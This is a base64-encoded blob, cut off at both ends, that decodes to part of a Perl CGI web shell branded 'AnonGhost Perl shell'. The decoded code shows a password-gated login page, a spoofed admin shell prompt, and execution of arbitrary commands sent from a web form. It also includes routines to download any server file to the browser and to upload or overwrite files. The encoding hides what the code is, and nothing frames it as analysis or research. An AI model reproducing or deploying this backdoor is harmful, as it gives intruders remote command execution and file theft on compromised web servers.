tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgUHJpbnRzIHRoZSBtZXNzYWdlIHRoYXQgaW5mb3JtcyB0aGUgdXNlciBvZiBhIGZhaWxlZCBsb2dpbg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50TG9naW5GYWlsZWRNZXNzYWdlDQp7DQoJcHJpbnQgPDxFTkQ7DQo8Y29kZT4NCjxicj5sb2dpbjogYWRtaW48YnI+DQpwYXNzd29yZDo8YnI+DQpMb2dpbiBpbmNvcnJlY3Q8YnI+PGJyPg0KPC9jb2RlPg0KRU5EDQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gZm9yIGxvZ2dpbmcgaW4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludExvZ2luRm9ybQ0Kew0KCXByaW50IDw8RU5EOw0KPGNvZGU+DQoNCjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImxvZ2luIj4NCjwvZm9udD4NCjxmb250IHNpemU9IjMiPg0KbG9naW46IDxiIHN0eWxlPSJjb2xvcjpibGFjaztiYWNrZ3JvdW5kLWNvbG9yOiNmZmZmNjYiPkFub25HaG9zdCBQZXJsIHNoZWxsPC9iPjxicj4NCnBhc3N3b3JkOjwvZm9udD48Zm9udCBjb2xvcj0iIzAwOTkwMCIgc2l6ZT0iMyI+PGlucHV0IHR5cGU9InBhc3N3b3JkIiBuYW1lPSJwIj4NCjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJFbnRlciI+DQo8L2Zvcm0+DQo8L2NvZGU+DQpFTkQNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIGZvb3RlciBmb3IgdGhlIEhUTUwgUGFnZQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50UGFnZUZvb3Rlcg0Kew0KCXByaW50ICI8L2ZvbnQ+PC9ib2R5PjwvaHRtbD4iOw0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFJldHJlaXZlcyB0aGUgdmFsdWVzIG9mIGFsbCBjb29raWVzLiBUaGUgY29va2llcyBjYW4gYmUgYWNjZXNzZXMgdXNpbmcgdGhlDQojIHZhcmlhYmxlICRDb29raWVzeycnfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIEdldENvb2tpZXMNCnsNCglAaHR0cGNvb2tpZXMgPSBzcGxpdCgvOyAvLCRFTlZ7J0hUVFBfQ09PS0lFJ30pOw0KCWZvcmVhY2ggJGNvb2tpZShAaHR0cGNvb2tpZXMpDQoJew0KCQkoJGlkLCAkdmFsKSA9IHNwbGl0KC89LywgJGNvb2tpZSk7DQoJCSRDb29raWVzeyRpZH0gPSAkdmFsOw0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIHNjcmVlbiB3aGVuIHRoZSB1c2VyIGxvZ3Mgb3V0DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRMb2dvdXRTY3JlZW4NCnsNCglwcmludCAiPGNvZGU+Q29ubmVjdGlvbiBjbG9zZWQgYnkgZm9yZWlnbiBob3N0Ljxicj48YnI+PC9jb2RlPiI7DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgTG9ncyBvdXQgdGhlIHVzZXIgYW5kIGFsbG93cyB0aGUgdXNlciB0byBsb2dpbiBhZ2Fpbg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFBlcmZvcm1Mb2dvdXQNCnsNCglwcmludCAiU2V0LUNvb2tpZTogU0FWRURQV0Q9O1xuIjsgIyByZW1vdmUgcGFzc3dvcmQgY29va2llDQoJJlByaW50UGFnZUhlYWRlcigicCIpOw0KCSZQcmludExvZ291dFNjcmVlbjsNCg0KCSZQcmludExvZ2luU2NyZWVuOw0KCSZQcmludExvZ2luRm9ybTsNCgkmUHJpbnRQYWdlRm9vdGVyOw0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHRvIGxvZ2luIHRoZSB1c2VyLiBJZiB0aGUgcGFzc3dvcmQgbWF0Y2hlcywgaXQNCiMgZGlzcGxheXMgYSBwYWdlIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIHJ1biBjb21tYW5kcy4gSWYgdGhlIHBhc3N3b3JkIGRvZW5zJ3QNCiMgbWF0Y2ggb3IgaWYgbm8gcGFzc3dvcmQgaXMgZW50ZXJlZCwgaXQgZGlzcGxheXMgYSBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyDQojIHRvIGxvZ2luDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUGVyZm9ybUxvZ2luIA0Kew0KCWlmKCRMb2dpblBhc3N3b3JkIGVxICRQYXNzd29yZCkgIyBwYXNzd29yZCBtYXRjaGVkDQoJew0KCQlwcmludCAiU2V0LUNvb2tpZTogU0FWRURQV0Q9JExvZ2luUGFzc3dvcmQ7XG4iOw0KCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7DQoJCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCX0NCgllbHNlICMgcGFzc3dvcmQgZGlkbid0IG1hdGNoDQoJew0KCQkmUHJpbnRQYWdlSGVhZGVyKCJwIik7DQoJCSZQcmludExvZ2luU2NyZWVuOw0KCQlpZigkTG9naW5QYXNzd29yZCBuZSAiIikgIyBzb21lIHBhc3N3b3JkIHdhcyBlbnRlcmVkDQoJCXsNCgkJCSZQcmludExvZ2luRmFpbGVkTWVzc2FnZTsNCg0KCQl9DQoJCSZQcmludExvZ2luRm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gZW50ZXIgY29tbWFuZHMNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtDQp7DQoJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7DQoJcHJpbnQgPDxFTkQ7DQo8Y29kZT4NCjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImNvbW1hbmQiPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZCIgdmFsdWU9IiRDdXJyZW50RGlyIj4NCiRQcm9tcHQNCjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJjIj4NCjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJFbnRlciI+DQo8L2Zvcm0+DQo8L2NvZGU+DQoNCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIGRvd25sb2FkIGZpbGVzDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRGaWxlRG93bmxvYWRGb3JtDQp7DQoJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7DQoJcHJpbnQgPDxFTkQ7DQo8Y29kZT4NCjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZCIgdmFsdWU9IiRDdXJyZW50RGlyIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJkb3dubG9hZCI+DQokUHJvbXB0IGRvd25sb2FkPGJyPjxicj4NCkZpbGVuYW1lOiA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iZiIgc2l6ZT0iMzUiPjxicj48YnI+DQpEb3dubG9hZDogPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkJlZ2luIj4NCjwvZm9ybT4NCjwvY29kZT4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIHVwbG9hZCBmaWxlcw0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50RmlsZVVwbG9hZEZvcm0NCnsNCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCglwcmludCA8PEVORDsNCjxjb2RlPg0KDQo8Zm9ybSBuYW1lPSJmIiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4NCiRQcm9tcHQgdXBsb2FkPGJyPjxicj4NCkZpbGVuYW1lOiA8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZiIgc2l6ZT0iMzUiPjxicj48YnI+DQpPcHRpb25zOiAmbmJzcDs8aW5wdXQgdHlwZT0iY2hlY2tib3giIG5hbWU9Im8iIHZhbHVlPSJvdmVyd3JpdGUiPg0KT3ZlcndyaXRlIGlmIGl0IEV4aXN0czxicj48YnI+DQpVcGxvYWQ6Jm5ic3A7Jm5ic3A7Jm5ic3A7PGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkJlZ2luIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0idXBsb2FkIj4NCjwvZm9ybT4NCjwvY29kZT4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHRpbWVvdXQgZm9yIGEgY29tbWFuZCBleHBpcmVzLiBXZSBuZWVkIHRvDQojIHRlcm1pbmF0ZSB0aGUgc2NyaXB0IGltbWVkaWF0ZWx5LiBUaGlzIGZ1bmN0aW9uIGlzIHZhbGlkIG9ubHkgb24gVW5peC4gSXQgaXMNCiMgbmV2ZXIgY2FsbGVkIHdoZW4gdGhlIHNjcmlwdCBpcyBydW5uaW5nIG9uIE5ULg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIENvbW1hbmRUaW1lb3V0DQp7DQoJaWYoISRXaW5OVCkNCgl7DQoJCWFsYXJtKDApOw0KCQlwcmludCA8PEVORDsNCjwveG1wPg0KDQo8Y29kZT4NCkNvbW1hbmQgZXhjZWVkZWQgbWF4aW11bSB0aW1lIG9mICRDb21tYW5kVGltZW91dER1cmF0aW9uIHNlY29uZChzKS4NCjxicj5LaWxsZWQgaXQhDQpFTkQNCgkJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07DQoJCSZQcmludFBhZ2VGb290ZXI7DQoJCWV4aXQ7DQoJfQ0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHRvIGV4ZWN1dGUgY29tbWFuZHMuIEl0IGRpc3BsYXlzIHRoZSBvdXRwdXQgb2YgdGhlDQojIGNvbW1hbmQgYW5kIGFsbG93cyB0aGUgdXNlciB0byBlbnRlciBhbm90aGVyIGNvbW1hbmQuIFRoZSBjaGFuZ2UgZGlyZWN0b3J5DQojIGNvbW1hbmQgaXMgaGFuZGxlZCBkaWZmZXJlbnRseS4gSW4gdGhpcyBjYXNlLCB0aGUgbmV3IGRpcmVjdG9yeSBpcyBzdG9yZWQgaW4NCiMgYW4gaW50ZXJuYWwgdmFyaWFibGUgYW5kIGlzIHVzZWQgZWFjaCB0aW1lIGEgY29tbWFuZCBoYXMgdG8gYmUgZXhlY3V0ZWQuIFRoZQ0KIyBvdXRwdXQgb2YgdGhlIGNoYW5nZSBkaXJlY3RvcnkgY29tbWFuZCBpcyBub3QgZGlzcGxheWVkIHRvIHRoZSB1c2Vycw0KIyB0aGVyZWZvcmUgZXJyb3IgbWVzc2FnZXMgY2Fubm90IGJlIGRpc3BsYXllZC4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBFeGVjdXRlQ29tbWFuZA0Kew0KCWlmKCRSdW5Db21tYW5kID1+IG0vXlxzKmNkXHMrKC4rKS8pICMgaXQgaXMgYSBjaGFuZ2UgZGlyIGNvbW1hbmQNCgl7DQoJCSMgd2UgY2hhbmdlIHRoZSBkaXJlY3RvcnkgaW50ZXJuYWxseS4gVGhlIG91dHB1dCBvZiB0aGUNCgkJIyBjb21tYW5kIGlzIG5vdCBkaXNwbGF5ZWQuDQoJCQ0KCQkkT2xkRGlyID0gJEN1cnJlbnREaXI7DQoJCSRDb21tYW5kID0gImNkIFwiJEN1cnJlbnREaXJcIiIuJENtZFNlcC4iY2QgJDEiLiRDbWRTZXAuJENtZFB3ZDsNCgkJY2hvcCgkQ3VycmVudERpciA9IGAkQ29tbWFuZGApOw0KCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7DQoJCSRQcm9tcHQgPSAkV2luTlQgPyAiJE9sZERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRPbGREaXJdXCQgIjsNCgkJcHJpbnQgIiRQcm9tcHQgJFJ1bkNvbW1hbmQiOw0KCX0NCgllbHNlICMgc29tZSBvdGhlciBjb21tYW5kLCBkaXNwbGF5IHRoZSBvdXRwdXQNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsNCgkJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7DQoJCXByaW50ICIkUHJvbXB0ICRSdW5Db21tYW5kPHhtcD4iOw0KCQkkQ29tbWFuZCA9ICJjZCBcIiRDdXJyZW50RGlyXCIiLiRDbWRTZXAuJFJ1bkNvbW1hbmQuJFJlZGlyZWN0b3I7DQoJCWlmKCEkV2luTlQpDQoJCXsNCgkJCSRTSUd7J0FMUk0nfSA9IFwmQ29tbWFuZFRpbWVvdXQ7DQoJCQlhbGFybSgkQ29tbWFuZFRpbWVvdXREdXJhdGlvbik7DQoJCX0NCgkJaWYoJFNob3dEeW5hbWljT3V0cHV0KSAjIHNob3cgb3V0cHV0IGFzIGl0IGlzIGdlbmVyYXRlZA0KCQl7DQoJCQkkfD0xOw0KCQkJJENvbW1hbmQgLj0gIiB8IjsNCgkJCW9wZW4oQ29tbWFuZE91dHB1dCwgJENvbW1hbmQpOw0KCQkJd2hpbGUoPENvbW1hbmRPdXRwdXQ+KQ0KCQkJew0KCQkJCSRfID1+IHMvKFxufFxyXG4pJC8vOw0KCQkJCXByaW50ICIkX1xuIjsNCgkJCX0NCgkJCSR8PTA7DQoJCX0NCgkJZWxzZSAjIHNob3cgb3V0cHV0IGFmdGVyIGNvbW1hbmQgY29tcGxldGVzDQoJCXsNCgkJCXByaW50IGAkQ29tbWFuZGA7DQoJCX0NCgkJaWYoISRXaW5OVCkNCgkJew0KCQkJYWxhcm0oMCk7DQoJCX0NCgkJcHJpbnQgIjwveG1wPiI7DQoJfQ0KCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOw0KCSZQcmludFBhZ2VGb290ZXI7DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBkaXNwbGF5cyB0aGUgcGFnZSB0aGF0IGNvbnRhaW5zIGEgbGluayB3aGljaCBhbGxvd3MgdGhlIHVzZXINCiMgdG8gZG93bmxvYWQgdGhlIHNwZWNpZmllZCBmaWxlLiBUaGUgcGFnZSBhbHNvIGNvbnRhaW5zIGEgYXV0by1yZWZyZXNoDQojIGZlYXR1cmUgdGhhdCBzdGFydHMgdGhlIGRvd25sb2FkIGF1dG9tYXRpY2FsbHkuDQojIEFyZ3VtZW50IDE6IEZ1bGx5IHF1YWxpZmllZCBmaWxlbmFtZSBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnREb3dubG9hZExpbmtQYWdlDQp7DQoJbG9jYWwoJEZpbGVVcmwpID0gQF87DQoJaWYoLWUgJEZpbGVVcmwpICMgaWYgdGhlIGZpbGUgZXhpc3RzDQoJew0KCQkjIGVuY29kZSB0aGUgZmlsZSBsaW5rIHNvIHdlIGNhbiBzZW5kIGl0IHRvIHRoZSBicm93c2VyDQoJCSRGaWxlVXJsID1+IHMvKFteYS16QS1aMC05XSkvJyUnLnVucGFjaygiSCoiLCQxKS9lZzsNCgkJJERvd25sb2FkTGluayA9ICIkU2NyaXB0TG9jYXRpb24/YT1kb3dubG9hZCZmPSRGaWxlVXJsJm89Z28iOw0KCQkkSHRtbE1ldGFIZWFkZXIgPSAiPG1ldGEgSFRUUC1FUVVJVj1cIlJlZnJlc2hcIiBDT05URU5UPVwiMTsgVVJMPSREb3dubG9hZExpbmtcIj4iOw0KCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7DQoJCXByaW50IDw8RU5EOw0KPGNvZGU+DQoNClNlbmRpbmcgRmlsZSAkVHJhbnNmZXJGaWxlLi4uPGJyPg0KSWYgdGhlIGRvd25sb2FkIGRvZXMgbm90IHN0YXJ0IGF1dG9tYXRpY2FsbHksDQo8YSBocmVmPSIkRG93bmxvYWRMaW5rIj5DbGljayBIZXJlPC9hPi4NCkVORA0KCQkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9DQoJZWxzZSAjIGZpbGUgZG9lc24ndCBleGlzdA0KCXsNCgkJJlByaW50UGFnZUhlYWRlcigiZiIpOw0KCQlwcmludCAiRmFpbGVkIHRvIGRvd25sb2FkICRGaWxlVXJsOiAkISI7DQoJCSZQcmludEZpbGVEb3dubG9hZEZvcm07DQoJCSZQcmludFBhZ2VGb290ZXI7DQoJfQ0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gcmVhZHMgdGhlIHNwZWNpZmllZCBmaWxlIGZyb20gdGhlIGRpc2sgYW5kIHNlbmRzIGl0IHRvIHRoZQ0KIyBicm93c2VyLCBzbyB0aGF0IGl0IGNhbiBiZSBkb3dubG9hZGVkIGJ5IHRoZSB1c2VyLg0KIyBBcmd1bWVudCAxOiBGdWxseSBxdWFsaWZpZWQgcGF0aG5hbWUgb2YgdGhlIGZpbGUgdG8gYmUgc2VudC4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBTZW5kRmlsZVRvQnJvd3Nlcg0Kew0KCWxvY2FsKCRTZW5kRmlsZSkgPSBAXzsNCglpZihvcGVuKFNFTkRGSUxFLCAkU2VuZEZpbGUpKSAjIGZpbGUgb3BlbmVkIGZvciByZWFkaW5nDQoJew0KCQlpZigkV2luTlQpDQoJCXsNCgkJCWJpbm1vZGUoU0VOREZJTEUpOw0KCQkJYmlubW9kZShTVERPVVQpOw0KCQl9DQoJCSRGaWxlU2l6ZSA9IChzdGF0KCRTZW5kRmlsZSkpWzddOw0KCQkoJEZpbGVuYW1lID0gJFNlbmRGaWxlKSA9fiAgbSEoW14vXlxcXSopJCE7DQoJCXByaW50ICJDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtdW5rbm93blxuIjsNCgkJcHJpbnQgIkNvbnRlbnQtTGVuZ3RoOiAkRmlsZVNpemVcbiI7DQoJCXByaW50ICJDb250ZW50LURpc3Bvc2l0aW9uOiBhdHRhY2htZW50OyBmaWxlbmFtZT0kMVxuXG4iOw0KCQlwcmludCB3aGlsZSg8U0VOREZJTEU+KTsNCgkJY2xvc2UoU0VOREZJTEUpOw0KCX0NCgllbHNlICMgZmFpbGVkIHRvIG9wZW4gZmlsZQ0KCXsNCgkJJlByaW50UGFnZUhlYWRlcigiZiIpOw0KCQlwcmludCAiRmFpbGVkIHRvIGRvd25sb2FkICRTZW5kRmlsZTogJCEiOw0KCQkmUHJpbnRGaWxlRG93bmxvYWRGb3JtOw0KDQoJCSZQcmludFBhZ2VGb290ZXI7DQoJfQ0KfQ0KDQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciBkb3dubG9hZHMgYSBmaWxlLiBJdCBkaXNwbGF5cyBhIG1lc3NhZ2UNCiMgdG8gdGhlIHVzZXIgYW5kIHByb3ZpZGVzIGEgbGluayB0aHJvdWdoIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLg0KIyBUaGlzIGZ1bmN0aW9uIGlzIGFsc28gY2FsbGVkIHdoZW4gdGhlIHVzZXIgY2xpY2tzIG9uIHRoYXQgbGluay4gSW4gdGhpcyBjYXNlLA0KIyB0aGUgZmlsZSBpcyByZWFkIGFuZCBzZW50IHRvIHRoZSBicm93c2VyLg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIEJlZ2luRG93bmxvYWQNCnsNCgkjIGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkDQoJaWYoKCRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlxcfF4uOi8pKSB8DQoJCSghJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXC8vKSkpICMgcGF0aCBpcyBhYnNvbHV0ZQ0KCXsNCgkJJFRhcmdldEZpbGUgPSAkVHJhbnNmZXJGaWxlOw0KCX0NCgllbHNlICMgcGF0aCBpcyByZWxhdGl2ZQ0KCXsNCgkJY2hvcCgkVGFyZ2V0RmlsZSkgaWYoJFRhcmdldEZpbGUgPSAkQ3VycmVudERpcikgPX4gbS9bXFxcL10kLzsNCgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsNCgl9DQoNCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQ0KCXsNCgkJJlNlbmRGaWxlVG9Ccm93c2VyKCRUYXJnZXRGaWxlKTsNCgl9DQoJZWxzZSAjIHdlIGhhdmUgdG8gc2VuZCBvbmx5IHRoZSBsaW5rIHBhZ2UNCgl7DQoJCSZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOw0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB1c2VyIHdhbnRzIHRvIHVwbG9hZCBhIGZpbGUuIElmIHRoZQ0KIyBmaWxlIGlzIG5vdCBzcGVjaWZpZWQsIGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGENCiMgZmlsZSwgb3RoZXJ3aXNlIGl0IHN0YXJ0cyB0aGUgdXBsb2FkIHByb2Nlc3MuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgVXBsb2FkRmlsZQ0Kew0KCSMgaWYgbm8gZmlsZSBpcyBzcGVjaWZpZWQsIHByaW50IHRoZSB1cGxvYWQgZm9ybSBhZ2Fpbg0KCWlmKCRUcmFuc2ZlckZpbGUgZXEgIiIpDQoJew0KCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7DQoJCSZQcmludEZpbGVVcGxvYWRGb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCQlyZXR1cm47DQoJfQ0KCSZQcmludFBhZ2VIZWFkZXIoImMiKTsNCg0KCSMgc3RhcnQgdGhlIHVwbG9hZ